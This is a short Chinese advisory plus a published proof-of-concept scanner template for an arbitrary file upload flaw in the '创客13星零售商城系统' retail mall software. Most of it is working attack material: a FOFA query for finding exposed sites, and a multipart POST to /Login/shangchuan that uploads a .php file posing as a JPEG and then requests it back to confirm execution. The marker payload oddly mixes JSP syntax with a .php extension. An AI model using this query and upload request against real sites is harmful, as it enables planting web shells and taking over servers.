漏洞描述
创客13星零售商城系统前台任意文件上传漏洞
fofa:"/Public/Xin/static/css/iconfont.css"
chuangke-shangchuan-fileupload: 创客13星零售商城系统前台任意文件上传漏洞
PoC代码[已公开]
id: chuangke-shangchuan-fileupload
info:
name: 创客13星零售商城系统前台任意文件上传漏洞
author: avic123
severity: critical
verified: true
description: |
创客13星零售商城系统前台任意文件上传漏洞
fofa:"/Public/Xin/static/css/iconfont.css"
reference:
- https://mp.weixin.qq.com/s?__biz=MzkzODY2ODA0OA==&mid=2247485436&idx=2&sn=c39a8b216a2be815a641702c1c24b99d
tags: chuangke,fileupload
created: 2025/03/19
set:
randstr: randomLowercase(8)
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /Login/shangchuan
headers:
Content-Type: multipart/form-data; boundary=--------{{rboundary}}
body: |
----------{{rboundary}}
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
Content-Type: image/jpeg
<%out.println("{{randstr}}");%>
----------{{rboundary}}--
expression: response.status == 200 && response.body.bcontains(b'code') && response.body.bcontains(b'"re":')
output:
search: '"\"re\":\"(?P<re>.*?)\"".bsubmatch(response.body)'
re: replaceAll(search["re"], "\\", "")
r1:
request:
method: GET
path: "{{re}}"
expression: response.status == 200 && response.body.bcontains(bytes(randstr))
expression: r0()&& r1()